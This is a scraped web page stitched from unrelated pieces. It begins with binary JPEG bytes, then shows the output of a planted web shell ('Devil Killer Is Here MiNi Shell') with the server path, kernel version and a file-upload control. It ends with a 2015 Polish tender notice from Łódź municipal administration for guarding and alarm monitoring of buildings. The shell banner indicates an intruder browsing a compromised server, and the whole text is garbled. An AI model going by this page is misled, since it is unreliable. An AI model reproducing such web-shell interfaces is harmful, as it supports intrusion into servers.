JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151202/328088-N-2015.html

<p class="kh_header"><b>Łódź: DOZÓR FIZYCZNY oraz MONITORING obiektów nieruchomoąci administrowanych przez Zamawiajacego</b><br>
<b>Numer ogłoszenia: 328088 - 2015; data zamieszczenia: 02.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Zasobów Komunalnych Łódź-Polesie , Pl. Barlickiego 11, 90-615 Łódź, woj. łódzkie, tel. 42 6330180, faks 42 6339607.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOZÓR FIZYCZNY oraz MONITORING obiektów nieruchomoąci administrowanych przez Zamawiajacego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dozoru fizycznego siedziby i jednostek organizacyjnych Zamawiającego wraz z obiektami nieruchomości administrowanych przez Zamawiającego  oraz  monitorowaniem obiektów.
Zamawiający podzielił zamówienie na:  dwie odrębne części
Część I  zamówienia  obejmuje :
Dozór fizyczny siedziby i jednostek organizacyjnych Zamawiającego przez okres 12 mcy zlokalizowanych: 
a Administracja Zasobów Komunalnych Łódź - Polesie oraz  A.Z.K. Rejon Obsługi Mieszkańców nr I   siedziba  90-615 Łódź,  Pl. Barlickiego 11 
b  A.Z.K. Łódź-Polesie Rejon Obsługi Mieszkańców nr II  i V,  siedziba 91-087 Łódź, ul. Wapienna 15
c A.Z.K. Łódź-Polesie Rejon Obsługi Mieszkańców IV,  siedziba 90-749 Łódź,
     ul. 28 Pułku Strzelców Kaniowskich 9 
      pełnienie dozoru  w/w siedzibach  w dni: 
      robocze : 
            poniedziałek od godz. 14:45    do godz. 9:15 we wtorek   
                         wtorek       od godz.16:45     do godz. 7:15 w środę
           pozostałe dni robocze   - od godz. 1445  do godz. 715
          pełnienie usługi   w dni  ustawowo wolne od pracy, niedziele  lub inne dni    
          wolne wyznaczone  przez Zamawiającego  -   dozór  całodobowy .

 Dozór  fizyczny obiektów - budynków  nieruchomości administrowanych przez    
    Zamawiającego  zlokalizowanych w Łodzi przy ul:

a  Objazdowa 17  budynek hotelowo  mieszkalny 2-kondygnacyjny, budynki parterowe garażowo gospodarcze , nieruchomość ogrodzona -pełnienie dozoru  obiektów odbywa się  całodobowo   przez okres 12 m cy ,

 b  Konstantynowska 115  jedenaście budynków, teren ogrodzony -Zajezdnia tramwajowa Brus   pełnienie dozoru  obiektów odbywa się  całodobowo  przez okres 12 m cy,

c   Lipowa 73    dwa budynki o funkcji biurowej oraz trzy budynki gospodarczo  garażowe  pełnienie dozoru  obiektów odbywa się  całodobowo  przez okres 12 m cy

d  Więckowskiego 76  budynek frontowy oraz budynek gospodarczy  zamontowana brama wjazdowa  pełnienie dozoru  obiektów odbywa się  całodobowo przez okres 5 m cy od  stycznia do 31.05.2016r

e  Więckowskiego 80   budynek frontowy  zamontowana brama wjazdowa     
    pełnienie dozoru  obiektu odbywa się  całodobowo przez okres 5 m cy od  stycznia do 31.05.2016r

f Zielona 57 budynek lewej oficyny  pełnienie dozoru  obiektu odbywa się  całodobowo przez okres 5 m-cy od  stycznia do 31.05.2016r

g Legionów 50  budynek frontowy i prawa oficyna, zamontowana brama, wspólne podwórko z  nieruchomością przy ul. Legionów 48  pełnienie dozoru  obiektów odbywa się  całodobowo przez okres 5 m-cy  od  lutego do 30.06.2016r
 Zakres wykonywania  usługi w  zakresie CZĘŚCI 1 obejmuje zabezpieczenie obiektu i mienia polegającej na  ochronie przed dostępem osób nieupoważnionych, 
 ochronie przed kradzieżą,  ochronie przed włamaniem ochronie przed zniszczeniem mienia, bieżącej kontroli wszystkich pomieszczeń obiektu.
Zakres ochrony obejmuje zabezpieczenie obiektu i mienia w nim się znajdującego przed działaniem osób trzecich oraz w sytuacjach innego zagrożenia, w szczególności pożarem, zalaniem wodą itp. Szczegółowe informacje dotyczące  przedmiotu zamówienia CZĘŚCI 1  oraz jego realizacji zawarte są  w  istotnych postanowienia umowy, stanowiącym załącznik nr 8 do SIWZ.
Część 2 zamówienia  -  obejmuje  monitorowanie  obiektów budynków  nieruchomości położonych w Łodzi przy ul. Radwańskiej 31  RON III  budynek jednostki organizacyjnej zamawiającego   pełnienie dozoru odbywa się : 
     w dni robocze  poniedziałek - od godz. 15 00   do godz. 900 we wtorek  ,        wtorek od godz.1700  do godz. 700 w środę, pozostałe dni robocze  od godz. 1500  do godz. 700 pełnienie usługi  w dni  ustawowo wolne od pracy, niedziele  lub inne dni wolne  wyznaczone    przez Zamawiającego   monitorowanie odbywa się całodobowo przez okres 12 m cy .

 6go Sierpnia 26   budynek  nieużytkowany pełnienie monitorowania odbywa się   w każdy dzień  tygodnia  całodobowo  przez  okres 12 m cy.
 Zakres wykonywania usługi w zakresie  CZĘŚCI 2 obejmuje zabezpieczenie obiektu i mienia w nim się znajdującego przed działaniem osób trzecich oraz w sytuacjach innego zagrożenia polegającej na podłączeniu systemu alarmowego w chronionym obiekcie  do systemu stacji monitorowania;  utrzymanie w pełnej sprawności systemu alarmowego; stałego dozoru sygnałów przyjmowanych,  gromadzonych   i przetwarzanych danych  w elektronicznych urządzeniach i systemach alarmowych; elektronicznych urządzeniach i systemach alarmowych, podjęcie działań przez grupę  interwencyjną,  zabezpieczenie obiektów dozorem fizycznym w przypadku zaistnienia awarii systemu..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający informuje, że   przewiduje udzielnie zamówień uzupełniających,  o którym  mowa w art. 67 ust. 1 pkt 6 ustawy Pzp. stanowiących nie więcej niż  50% wartości zamówienia podstawowego i polegającego na powtórzeniu tego samego rodzaju zamówienia tj zapewnienie dozoru  obiektów na  - dodatkowej nieruchomości.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.10.00-1, 50.32.41.00-3, 50.00.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wpłacenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek spełniają wykonawcy, którzy wykażą, że posiadają aktualną koncesję  wydaną przez Ministerstwo Spraw Wewnętrznych i Administracji na prowadzenie  działalności  gospodarczej w zakresie usług ochrony osób i mienia zgodnie z ustawą z dnia 22 sierpnia 1997r. o ochronie osób i mienia (Dz.U. 2014r. poz. 1099)  oraz złożą oświadczenie o spełnieniu  warunku udziału  w postępowaniu w zakresie  art. 22  ust. 1 ustawy  Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, gdy Wykonawca dla :  CZĘŚĆ 1 zamówienia - w zakresie ochrony fizycznej obiektów -  wykaże się doświadczeniem w wykonaniu usług  a w przypadku świadczeń okresowych lub ciągłych  również wykonywaniu , że  w okresie ostatnich trzech lat przed  upływem terminu składania  ofert  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie   wykonał  dla zamawiającego publicznego  dwie usługi o wartości łącznej 300 000,00zł. brutto, załączając dowody świadczące o należytym wykonaniu usług .
CZĘŚĆ 2 zamówienia - w zakresie monitorowania obiektów wykaże się doświadczeniem w wykonaniu usług a w przypadku świadczeń okresowych lub ciągłych  również wykonywaniu, że  w okresie ostatnich trzech lat przed  upływem terminu składania  ofert  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał dla zamawiającego publicznego  co najmniej dwie usługi o wartości łącznej   3 000,00zł. brutto  , załączając dowody świadczące o należytym wykonaniu usług.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, gdy Wykonawca wykaże, że dysponuje lub będzie dysponował zdolnymi tj. niekaranymi osobami w ilości niezbędnej do realizacji zamówienia w tym dla:
 CZĘŚĆ 1 zamówienia  -   co najmniej jedną osobą organizującą prace i kierującą zespołem  pracowników bezpośredniej ochrony, wpisaną na listę kwalifikowanych pracowników ochrony  fizycznej oraz posiadającą legitymację kwalifikowanego pracownika ochrony fizycznej. CZĘŚĆ 2 zamówienia  -  co najmniej jedną osobą organizującą prace  i kierującą zespołem pracowników bezpośredniej ochrony, wpisaną na listę kwalifikowanych pracowników ochrony  fizycznej oraz posiadającą legitymację kwalifikowanego pracownika ochrony fizycznej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, gdy Wykonawca wykaże, że posiada opłaconą  polisę lub inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej  obejmującą ubezpieczenie     kontraktowe i deliktowe w zakresie prowadzonej działalności gospodarczej związanej z  przedmiotem zamówienia na kwotę nie mniejszą niż: dla  CZĘŚCI  1 zamówienia  na kwotę co najmniej   4 000 000 zł. dla  CZĘŚCI 2 zamówienia  na kwotę  co najmniej   2 000 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>CZĘŚĆ 1 zamówienia - w zakresie ochrony fizycznej obiektów -  wykaże się doświadczeniem w wykonaniu usług  a w przypadku świadczeń okresowych lub ciągłych  również wykonywaniu , że  w okresie ostatnich trzech lat przed  upływem terminu składania  ofert  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie   wykonał  dla zamawiającego publicznego  dwie usługi o wartości łącznej 300 000,00zł. brutto, załączając dowody świadczące o należytym wykonaniu usług .
CZĘŚĆ 2 zamówienia - w zakresie monitorowania obiektów wykaże się doświadczeniem w wykonaniu usług a w przypadku świadczeń okresowych lub ciągłych  również wykonywaniu, że  w okresie ostatnich trzech lat przed  upływem terminu składania  ofert  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał dla zamawiającego publicznego  co najmniej dwie usługi o wartości łącznej   3 000,00zł. brutto  , załączając dowody świadczące o należytym wykonaniu usług.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz wykonanych lub wykonywanych usług,   w okresie ostatnich trzech lat przed  upływem terminu składania  ofert  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  załączając załącznik nr 5 do SIWZ wraz z dowodami świadczącymi o należytym wykonaniu lub wykonywaniu usług  oraz dokumenty wymienione w Rozdziale VII  SIWZ .</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - Doświadczenie - 4</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 ustawy Prawo zamówień publicznych, dopuści zmianę  umowy:
1. W zakresie zmiany wynagrodzenia - w przypadkach:
a.zmiany stawki podatku VAT,  jeżeli zmienią się przepisy w tym zakresie;
b.wyłączenia z przedmiotu umowy nieruchomości dla której  nie będzie zachodziła konieczność pełnienia dozoru fizycznego np. w przypadku zasiedlenia jej w 50% przez najemców lub przekazania zarządu nieruchomością objętą wykazem podmiotowi trzeciemu.
2. Dopuszczalne są wszelkie inne zmiany umowy obiektywnie oceniane jako korzystne dla   
    Zamawiającego, dotyczące sytuacji, które nie były znane stroną w chwili zawarcia umowy.  
3.Wszelkie zmiany treści umowy wymagają formy pisemnej - aneksu, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> zamowienia.polesie@azk.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja Zasobów Komunalnych Łódź - Polesie 90-615 Łódź, Pl.Barlickiego 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2015 godzina 11:00, miejsce: w siedzibie zamawiającego Łódź, Pl. Barlickiego 11 pok. 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dozór fizyczne obiektów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> obejmuje :
 Dozór fizyczny siedziby i jednostek organizacyjnych Zamawiającego    przez okres 12  m-cy zlokalizowanych: 
a)Administracja Zasobów Komunalnych Łódź - Polesie oraz  A.Z.K. Rejon Obsługi Mieszkańców nr I   siedziba  90-615 Łódź,  Pl. Barlickiego 11 
b)  A.Z.K. Łódź-Polesie Rejon Obsługi Mieszkańców nr II  i V,  siedziba 91-087 Łódź,  ul. Wapienna 15
c) A.Z.K. Łódź-Polesie Rejon Obsługi Mieszkańców IV,  siedziba 90-749 Łódź,
     ul. 28 Pułku Strzelców Kaniowskich 9 
 Dozór  fizyczny obiektów - budynków  nieruchomości administrowanych przez    
    Zamawiającego  zlokalizowanych w Łodzi przy ul:

